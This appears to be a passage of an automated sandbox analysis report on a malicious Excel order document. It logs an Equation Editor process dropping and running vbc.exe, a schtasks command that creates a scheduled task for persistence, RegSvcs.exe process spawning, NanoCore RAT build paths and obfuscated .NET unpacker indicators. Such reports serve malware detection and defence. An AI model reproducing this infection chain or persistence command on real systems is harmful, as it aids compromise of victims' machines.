Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CXFxEHIAOoJFws' /XML 'C:\Users\user\AppData\Local\Temp\tmp98E5.tmp'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: C:\Users\Public\vbc.exeCode function: 4_2_004708DE AdjustTokenPrivileges,
Source: C:\Users\Public\vbc.exeCode function: 4_2_004708A7 AdjustTokenPrivileges,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_005310DE AdjustTokenPrivileges,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_005310A7 AdjustTokenPrivileges,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Sts Global Order.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE5DB.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@8/18@20/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: Sts Global Order.xlsxJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\rmGtfB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{dcf3fee6-c103-45ee-a2f0-f8afaa78d1fe}
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: indows\RegSvcs.pdbpdbvcs.pdbg source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: wvcs.pdb source: RegSvcs.exe, 00000007.00000002.677037121.0000000004A5D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\RegSvcs.pdbD source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: sunday[1].exe.2.dr, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.cs.Net Code: EOD88KdCEU System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.2.dr, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.cs.Net Code: EOD88KdCEU System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: CXFxEHIAOoJFws.exe.4.dr, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.cs.Net Code: EOD88KdCEU System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.d00000.0.unpack, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.cs.Net Code: EOD88KdCEU System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.d00000.1.unpack, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.cs.Net Code: EOD88KdCEU System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\Public\vbc.exeCode function: 4_2_00149D72 push ebp; retf
Source: C:\Users\Public\vbc.exeCode function: 4_2_00149D6E push ecx; retf
Source: C:\Users\Public\vbc.exeCode function: 4_2_0032CA96 push eax; retf 0032h
Source: C:\Users\Public\vbc.exeCode function: 4_2_003276EF push ebp; retf
Source: C:\Users\Public\vbc.exeCode function: 4_2_00327706 push ebx; retf
Source: C:\Users\Public\vbc.exeCode function: 4_2_00323BA8 pushfd ; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_002A74A8 push ebp; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_002A749C push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_002A989B push ecx; retf 002Ah
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_002A9D1E pushad ; retf
Source: initial sampleStatic PE information: section name: .text entropy: 7.90482158823
Source: initial sampleStatic PE information: section name: .text entropy: 7.90482158823
Source: initial sampleStatic PE information: section name: .text entropy: 7.90482158823
Source: sunday[1].exe.2.dr, G7gig1XoOesu002ujr/QO0J29O1epEQ2KyoYx.csHigh entropy of concatenated method names: 'qoNk23KeHa', 'K66krexY1O', 'PDqknkOSUW', 'ghHkJiJagd', 'SgTku5stl3', 'fWmkgoN2U5', 'E5ykcn4I4M', 'c6QkOkDkJ9', 'MMukXI1GhJ', '.ctor'
Source: sunday[1].exe.2.dr, w9AFeXCE2LplTLqrwa/wBlpvxnG1OO8NZvrh2.csHigh entropy of concatenated method names: 'G042ccYIU', 'jVoFPgyQK', 'gQLrWqZ91', 'WU9xXnGcp', 'xIgn6Rsnn', 'hwmCk16El', 'CoTJomARp', 'AS2brx4Hm', 'pLiuTiQbY', '.ctor'
Source: sunday[1].exe.2.dr, l7OxcvLstbIw8lvGdC/RvI4vZgoQLudakmusH.csHigh entropy of concatenated method names: 'wN0p2cDfr', 'T5C6PZrZb', '.ctor', 'nGiwowp1Z', 'V2j0HL0v4', 'clNsO0J29', 'TepYEQ2Ky', 'JYxos7gig', 'ToOQesu00', 'eujfrjHtv'
Source: sunday[1].exe.2.dr, wy1AdR1np9WlJVqIhu/Cie2rZaBGedqv9947T.csHigh entropy of concatenated method names: 'SlkGgsDX3i', 'bHpGLEUxQy', 'qnKGHPdynA', 'vmdGOEeoJ3', '.ctor', 'hwmGEk16El', 'KQXfyj2zJQ8MrBNeABL', 'pivo7TxOtTwwmcNRlOI', 'tY9QjbxHxcRGrnLGAu4', 'qfGsQdx20MZXaBbxQtj'
Source: sunday[1].exe.2.dr, CuDKkqb9fujhnZr9Ai/PP4n1TJr1Xh9QQ9GpY.csHigh entropy of concatenated method names: 'g1Xeh9QQ9', 'cpYtvuDKk', 'g9AiiDfDN', 'nkXlP1Ci2', '.ctor', 'qO8ONZvrh', 'ei9XAFeXE', 'eLpBlTLqr', 'AFZGYZCJd5', 'FaNAP4n1T'
Source: sunday[1].exe.2.dr, nNVJ9C3AKISUwBhf7F/LfDNLkuXP1Ci2OIbjn.csHigh entropy of concatenated method names: 'y4vRZoQLu', 'CakymusHu', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'dpJSAufGiedR27AlO7', 'GtT0wqXyUcb1q6aQBd', 'iCkukpzscUq8PAllws', 'zhZwPCHOL6OYbgQVFKI'
Source: sunday[1].exe.2.dr, sRpRS2Frx4HmHLiTiQ/Asnnnw2mk16ElvoTom.csHigh entropy of concatenated method names: 'AFZkZCJd5', 'QuYnbtNkBAIknWgOB4', 'Xe921B6KBuqrDhUc2i', 'AerSd7r5Mj1frUSoQ3', 'EUwFwIa9RhhA0y84vV', 'qnbJsWcestqFm4lt9c', 'uCSrdb7B9GDDPpnkO5'
Source: sunday[1].exe.2.dr, PEJBXMArGEXXMibeB4/VHtvIHBBI0AWiAfhcJ.csHigh entropy of concatenated method names: 'jpjkwsAGDN', 'GMtk0q7LvC', 'OxhkYJucG6', 'bWpkork4Lf', '.ctor', 'l3IGQ1d0RG', 'ToString', 'pluk6S3m4W', 'hJPHskHI11plv4xyaJp', 'lvi45nHGRQeB9GSMfoH'
Source: sunday[1].exe.2.dr, ystl3c6mum6VKbFWmo/piJagdp94nIKaI1agT.csHigh entropy of concatenated method names: 'ChT8tOVuYB', 'bJh8mxEW6L', 'kim8lWMFBF', 'dFx8IXLsLO', 'Xhv8RAx199', 'q9h8d1AK5g', 'zVm8vP59JH', '.ctor', 'GNxGoepZ5L', 'YAm8XVK8H4'
Source: sunday[1].exe.2.dr, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.csHigh entropy of concatenated method names: '.ctor', 'oIIkzTr2L0', 'QQ68qt0Juf', 'Dispose', 'xpn8kRlOqe', 'EOD88KdCEU', 'W6NjmbH3MRaI6VdAhj7', 'rmRrjoHpfMLwMSRCXnw', 'RtnZp7HeLQoraQN6lnO', 'F5RhEBHu37vqd1Olwjw'
Source: sunday[1].exe.2.dr, zsKCbvMEqdplulquC5/l83ecsIQRYPU9U2WDW.csHigh entropy of concatenated method names: 'I5K8uZpD7H', 'mF583XMeqW', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'roYdQD2h0yQjGEh2C9Q', 'RLjTxv28FEAwN9Gf6Kc', 'usXvsr2mPlZhnIfkwA9'
Source: vbc.exe.2.dr, G7gig1XoOesu002ujr/QO0J29O1epEQ2KyoYx.csHigh entropy of concatenated method names: 'qoNk23KeHa', 'K66krexY1O', 'PDqknkOSUW', 'ghHkJiJagd', 'SgTku5stl3', 'fWmkgoN2U5', 'E5ykcn4I4M', 'c6QkOkDkJ9', 'MMukXI1GhJ', '.ctor'
Source: vbc.exe.2.dr, w9AFeXCE2LplTLqrwa/wBlpvxnG1OO8NZvrh2.csHigh entropy of concatenated method names: 'G042ccYIU', 'jVoFPgyQK', 'gQLrWqZ91', 'WU9xXnGcp', 'xIgn6Rsnn', 'hwmCk16El', 'CoTJomARp', 'AS2brx4Hm', 'pLiuTiQbY', '.ctor'
Source: vbc.exe.2.dr, l7OxcvLstbIw8lvGdC/RvI4vZgoQLudakmusH.csHigh entropy of concatenated method names: 'wN0p2cDfr', 'T5C6PZrZb', '.ctor', 'nGiwowp1Z', 'V2j0HL0v4', 'clNsO0J29', 'TepYEQ2Ky', 'JYxos7gig', 'ToOQesu00', 'eujfrjHtv'
Source: vbc.exe.2.dr, wy1AdR1np9WlJVqIhu/Cie2rZaBGedqv9947T.csHigh entropy of concatenated method names: 'SlkGgsDX3i', 'bHpGLEUxQy', 'qnKGHPdynA', 'vmdGOEeoJ3', '.ctor', 'hwmGEk16El', 'KQXfyj2zJQ8MrBNeABL', 'pivo7TxOtTwwmcNRlOI', 'tY9QjbxHxcRGrnLGAu4', 'qfGsQdx20MZXaBbxQtj'
Source: vbc.exe.2.dr, CuDKkqb9fujhnZr9Ai/PP4n1TJr1Xh9QQ9GpY.csHigh entropy of concatenated method names: 'g1Xeh9QQ9', 'cpYtvuDKk', 'g9AiiDfDN', 'nkXlP1Ci2', '.ctor', 'qO8ONZvrh', 'ei9XAFeXE', 'eLpBlTLqr', 'AFZGYZCJd5', 'FaNAP4n1T'
Source: vbc.exe.2.dr, nNVJ9C3AKISUwBhf7F/LfDNLkuXP1Ci2OIbjn.csHigh entropy of concatenated method names: 'y4vRZoQLu', 'CakymusHu', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'dpJSAufGiedR27AlO7', 'GtT0wqXyUcb1q6aQBd', 'iCkukpzscUq8PAllws', 'zhZwPCHOL6OYbgQVFKI'
Source: vbc.exe.2.dr, sRpRS2Frx4HmHLiTiQ/Asnnnw2mk16ElvoTom.csHigh entropy of concatenated method names: 'AFZkZCJd5', 'QuYnbtNkBAIknWgOB4', 'Xe921B6KBuqrDhUc2i', 'AerSd7r5Mj1frUSoQ3', 'EUwFwIa9RhhA0y84vV', 'qnbJsWcestqFm4lt9c', 'uCSrdb7B9GDDPpnkO5'
Source: vbc.exe.2.dr, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.csHigh entropy of concatenated method names: '.ctor', 'oIIkzTr2L0', 'QQ68qt0Juf', 'Dispose', 'xpn8kRlOqe', 'EOD88KdCEU', 'W6NjmbH3MRaI6VdAhj7', 'rmRrjoHpfMLwMSRCXnw', 'RtnZp7HeLQoraQN6lnO', 'F5RhEBHu37vqd1Olwjw'
Source: vbc.exe.2.dr, PEJBXMArGEXXMibeB4/VHtvIHBBI0AWiAfhcJ.csHigh entropy of concatenated method names: 'jpjkwsAGDN', 'GMtk0q7LvC', 'OxhkYJucG6', 'bWpkork4Lf', '.ctor', 'l3IGQ1d0RG', 'ToString', 'pluk6S3m4W', 'hJPHskHI11plv4xyaJp', 'lvi45nHGRQeB9GSMfoH'
Source: vbc.exe.2.dr, ystl3c6mum6VKbFWmo/piJagdp94nIKaI1agT.csHigh entropy of concatenated method names: 'ChT8tOVuYB', 'bJh8mxEW6L', 'kim8lWMFBF', 'dFx8IXLsLO', 'Xhv8RAx199', 'q9h8d1AK5g', 'zVm8vP59JH', '.ctor', 'GNxGoepZ5L', 'YAm8XVK8H4'
Source: vbc.exe.2.dr, zsKCbvMEqdplulquC5/l83ecsIQRYPU9U2WDW.csHigh entropy of concatenated method names: 'I5K8uZpD7H', 'mF583XMeqW', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'roYdQD2h0yQjGEh2C9Q', 'RLjTxv28FEAwN9Gf6Kc', 'usXvsr2mPlZhnIfkwA9'
Source: CXFxEHIAOoJFws.exe.4.dr, G7gig1XoOesu002ujr/QO0J29O1epEQ2KyoYx.csHigh entropy of concatenated method names: 'qoNk23KeHa', 'K66krexY1O', 'PDqknkOSUW', 'ghHkJiJagd', 'SgTku5stl3', 'fWmkgoN2U5', 'E5ykcn4I4M', 'c6QkOkDkJ9', 'MMukXI1GhJ', '.ctor'
Source: CXFxEHIAOoJFws.exe.4.dr, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.csHigh entropy of concatenated method names: '.ctor', 'oIIkzTr2L0', 'QQ68qt0Juf', 'Dispose', 'xpn8kRlOqe', 'EOD88KdCEU', 'W6NjmbH3MRaI6VdAhj7', 'rmRrjoHpfMLwMSRCXnw', 'RtnZp7HeLQoraQN6lnO', 'F5RhEBHu37vqd1Olwjw'
Source: CXFxEHIAOoJFws.exe.4.dr, w9AFeXCE2LplTLqrwa/wBlpvxnG1OO8NZvrh2.csHigh entropy of concatenated method names: 'G042ccYIU', 'jVoFPgyQK', 'gQLrWqZ91', 'WU9xXnGcp', 'xIgn6Rsnn', 'hwmCk16El', 'CoTJomARp', 'AS2brx4Hm', 'pLiuTiQbY', '.ctor'
Source: CXFxEHIAOoJFws.exe.4.dr, l7OxcvLstbIw8lvGdC/RvI4vZgoQLudakmusH.csHigh entropy of concatenated method names: 'wN0p2cDfr', 'T5C6PZrZb', '.ctor', 'nGiwowp1Z', 'V2j0HL0v4', 'clNsO0J29', 'TepYEQ2Ky', 'JYxos7gig', 'ToOQesu00', 'eujfrjHtv'
Source: CXFxEHIAOoJFws.exe.4.dr, CuDKkqb9fujhnZr9Ai/PP4n1TJr1Xh9QQ9GpY.csHigh entropy of concatenated method names: 'g1Xeh9QQ9', 'cpYtvuDKk', 'g9AiiDfDN', 'nkXlP1Ci2', '.ctor', 'qO8ONZvrh', 'ei9XAFeXE', 'eLpBlTLqr', 'AFZGYZCJd5', 'FaNAP4n1T'
Source: CXFxEHIAOoJFws.exe.4.dr, zsKCbvMEqdplulquC5/l83ecsIQRYPU9U2WDW.csHigh entropy of concatenated method names: 'I5K8uZpD7H', 'mF583XMeqW', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'roYdQD2h0yQjGEh2C9Q', 'RLjTxv28FEAwN9Gf6Kc', 'usXvsr2mPlZhnIfkwA9'
Source: CXFxEHIAOoJFws.exe.4.dr, wy1AdR1np9WlJVqIhu/Cie2rZaBGedqv9947T.csHigh entropy of concatenated method names: 'SlkGgsDX3i', 'bHpGLEUxQy', 'qnKGHPdynA', 'vmdGOEeoJ3', '.ctor', 'hwmGEk16El', 'KQXfyj2zJQ8MrBNeABL', 'pivo7TxOtTwwmcNRlOI', 'tY9QjbxHxcRGrnLGAu4', 'qfGsQdx20MZXaBbxQtj'
Source: CXFxEHIAOoJFws.exe.4.dr, nNVJ9C3AKISUwBhf7F/LfDNLkuXP1Ci2OIbjn.csHigh entropy of concatenated method names: 'y4vRZoQLu', 'CakymusHu', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'dpJSAufGiedR27AlO7', 'GtT0wqXyUcb1q6aQBd', 'iCkukpzscUq8PAllws', 'zhZwPCHOL6OYbgQVFKI'
Source: CXFxEHIAOoJFws.exe.4.dr, sRpRS2Frx4HmHLiTiQ/Asnnnw2mk16ElvoTom.csHigh entropy of concatenated method names: 'AFZkZCJd5', 'QuYnbtNkBAIknWgOB4', 'Xe921B6KBuqrDhUc2i', 'AerSd7r5Mj1frUSoQ3', 'EUwFwIa9RhhA0y84vV', 'qnbJsWcestqFm4lt9c', 'uCSrdb7B9GDDPpnkO5'
Source: CXFxEHIAOoJFws.exe.4.dr, ystl3c6mum6VKbFWmo/piJagdp94nIKaI1agT.csHigh entropy of concatenated method names: 'ChT8tOVuYB', 'bJh8mxEW6L', 'kim8lWMFBF', 'dFx8IXLsLO', 'Xhv8RAx199', 'q9h8d1AK5g', 'zVm8vP59JH', '.ctor', 'GNxGoepZ5L', 'YAm8XVK8H4'
Source: CXFxEHIAOoJFws.exe.4.dr, PEJBXMArGEXXMibeB4/VHtvIHBBI0AWiAfhcJ.csHigh entropy of concatenated method names: 'jpjkwsAGDN', 'GMtk0q7LvC', 'OxhkYJucG6', 'bWpkork4Lf', '.ctor', 'l3IGQ1d0RG', 'ToString', 'pluk6S3m4W', 'hJPHskHI11plv4xyaJp', 'lvi45nHGRQeB9GSMfoH'
Source: 4.0.vbc.exe.d00000.0.unpack, G7gig1XoOesu002ujr/QO0J29O1epEQ2KyoYx.csHigh entropy of concatenated method names: 'qoNk23KeHa', 'K66krexY1O', 'PDqknkOSUW', 'ghHkJiJagd', 'SgTku5stl3', 'fWmkgoN2U5', 'E5ykcn4I4M', 'c6QkOkDkJ9', 'MMukXI1GhJ', '.ctor'
Source: 4.0.vbc.exe.d00000.0.unpack, w9AFeXCE2LplTLqrwa/wBlpvxnG1OO8NZvrh2.csHigh entropy of concatenated method names: 'G042ccYIU', 'jVoFPgyQK', 'gQLrWqZ91', 'WU9xXnGcp', 'xIgn6Rsnn', 'hwmCk16El', 'CoTJomARp', 'AS2brx4Hm', 'pLiuTiQbY', '.ctor'
Source: 4.0.vbc.exe.d00000.0.unpack, ystl3c6mum6VKbFWmo/piJagdp94nIKaI1agT.csHigh entropy of concatenated method names: 'ChT8tOVuYB', 'bJh8mxEW6L', 'kim8lWMFBF', 'dFx8IXLsLO', 'Xhv8RAx199', 'q9h8d1AK5g', 'zVm8vP59JH', '.ctor', 'GNxGoepZ5L', 'YAm8XVK8H4'
Source: 4.0.vbc.exe.d00000.0.unpack, l7OxcvLstbIw8lvGdC/RvI4vZgoQLudakmusH.csHigh entropy of concatenated method names: 'wN0p2cDfr', 'T5C6PZrZb', '.ctor', 'nGiwowp1Z', 'V2j0HL0v4', 'clNsO0J29', 'TepYEQ2Ky', 'JYxos7gig', 'ToOQesu00', 'eujfrjHtv'
Source: 4.0.vbc.exe.d00000.0.unpack, wy1AdR1np9WlJVqIhu/Cie2rZaBGedqv9947T.csHigh entropy of concatenated method names: 'SlkGgsDX3i', 'bHpGLEUxQy', 'qnKGHPdynA', 'vmdGOEeoJ3', '.ctor', 'hwmGEk16El', 'KQXfyj2zJQ8MrBNeABL', 'pivo7TxOtTwwmcNRlOI', 'tY9QjbxHxcRGrnLGAu4', 'qfGsQdx20MZXaBbxQtj'
Source: 4.0.vbc.exe.d00000.0.unpack, CuDKkqb9fujhnZr9Ai/PP4n1TJr1Xh9QQ9GpY.csHigh entropy of concatenated method names: 'g1Xeh9QQ9', 'cpYtvuDKk', 'g9AiiDfDN', 'nkXlP1Ci2', '.ctor', 'qO8ONZvrh', 'ei9XAFeXE', 'eLpBlTLqr', 'AFZGYZCJd5', 'FaNAP4n1T'
Source: 4.0.vbc.exe.d00000.0.unpack, PEJBXMArGEXXMibeB4/VHtvIHBBI0AWiAfhcJ.csHigh entropy of concatenated method names: 'jpjkwsAGDN', 'GMtk0q7LvC', 'OxhkYJucG6', 'bWpkork4Lf', '.ctor', 'l3IGQ1d0RG', 'ToString', 'pluk6S3m4W', 'hJPHskHI11plv4xyaJp', 'lvi45nHGRQeB9GSMfoH'
Source: 4.0.vbc.exe.d00000.0.unpack, nNVJ9C3AKISUwBhf7F/LfDNLkuXP1Ci2OIbjn.csHigh entropy of concatenated method names: 'y4vRZoQLu', 'CakymusHu', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'dpJSAufGiedR27AlO7', 'GtT0wqXyUcb1q6aQBd', 'iCkukpzscUq8PAllws', 'zhZwPCHOL6OYbgQVFKI'
Source: 4.0.vbc.exe.d00000.0.unpack, sRpRS2Frx4HmHLiTiQ/Asnnnw2mk16ElvoTom.csHigh entropy of concatenated method names: 'AFZkZCJd5', 'QuYnbtNkBAIknWgOB4', 'Xe921B6KBuqrDhUc2i', 'AerSd7r5Mj1frUSoQ3', 'EUwFwIa9RhhA0y84vV', 'qnbJsWcestqFm4lt9c', 'uCSrdb7B9GDDPpnkO5'
Source: 4.0.vbc.exe.d00000.0.unpack, zsKCbvMEqdplulquC5/l83ecsIQRYPU9U2WDW.csHigh entropy of concatenated method names: 'I5K8uZpD7H', 'mF583XMeqW', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'roYdQD2h0yQjGEh2C9Q', 'RLjTxv28FEAwN9Gf6Kc', 'usXvsr2mPlZhnIfkwA9'
Source: 4.0.vbc.exe.d00000.0.unpack, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.csHigh entropy of concatenated method names: '.ctor', 'oIIkzTr2L0', 'QQ68qt0Juf', 'Dispose', 'xpn8kRlOqe', 'EOD88KdCEU', 'W6NjmbH3MRaI6VdAhj7', 'rmRrjoHpfMLwMSRCXnw', 'RtnZp7HeLQoraQN6lnO', 'F5RhEBHu37vqd1Olwjw'
Source: 4.2.vbc.exe.d00000.1.unpack, G7gig1XoOesu002ujr/QO0J29O1epEQ2KyoYx.csHigh entropy of concatenated method names: 'qoNk23KeHa', 'K66krexY1O', 'PDqknkOSUW', 'ghHkJiJagd', 'SgTku5stl3', 'fWmkgoN2U5', 'E5ykcn4I4M', 'c6QkOkDkJ9', 'MMukXI1GhJ', '.ctor'
Source: 4.2.vbc.exe.d00000.1.unpack, aLbmQP5X7AxnbXq2yc/NQiALol57x9DCRXC3f.csHigh entropy of concatenated method names: '.ctor', 'oIIkzTr2L0', 'QQ68qt0Juf', 'Dispose', 'xpn8kRlOqe', 'EOD88KdCEU', 'W6NjmbH3MRaI6VdAhj7', 'rmRrjoHpfMLwMSRCXnw', 'RtnZp7HeLQoraQN6lnO', 'F5RhEBHu37vqd1Olwjw'
Source: 4.2.vbc.exe.d00000.1.unpack, w9AFeXCE2LplTLqrwa/wBlpvxnG1OO8NZvrh2.csHigh entropy of concatenated method names: 'G042ccYIU', 'jVoFPgyQK', 'gQLrWqZ91', 'WU9xXnGcp', 'xIgn6Rsnn', 'hwmCk16El', 'CoTJomARp', 'AS2brx4Hm', 'pLiuTiQbY', '.ctor'
Source: 4.2.vbc.exe.d00000.1.unpack, l7OxcvLstbIw8lvGdC/RvI4vZgoQLudakmusH.csHigh entropy of concatenated method names: 'wN0p2cDfr', 'T5C6PZrZb', '.ctor', 'nGiwowp1Z', 'V2j0HL0v4', 'clNsO0J29', 'TepYEQ2Ky', 'JYxos7gig', 'ToOQesu00', 'eujfrjHtv'
Source: 4.2.vbc.exe.d00000.1.unpack, ystl3c6mum6VKbFWmo/piJagdp94nIKaI1agT.csHigh entropy of concatenated method names: 'ChT8tOVuYB', 'bJh8mxEW6L', 'kim8lWMFBF', 'dFx8IXLsLO', 'Xhv8RAx199', 'q9h8d1AK5g', 'zVm8vP59JH', '.ctor', 'GNxGoepZ5L', 'YAm8XVK8H4'
Source: 4.2.vbc.exe.d00000.1.unpack, nNVJ9C3AKISUwBhf7F/LfDNLkuXP1Ci2OIbjn.csHigh entropy of concatenated method names: 'y4vRZoQLu', 'CakymusHu', '.ctor', 'GNxGoepZ5L', 'l3IGQ1d0RG', 'ToString', 'dpJSAufGiedR27AlO7', 'GtT0wqXyUcb1q6aQBd', 'iCkukpzscUq8PAllws', 'zhZwPCHOL6OYbgQVFKI'
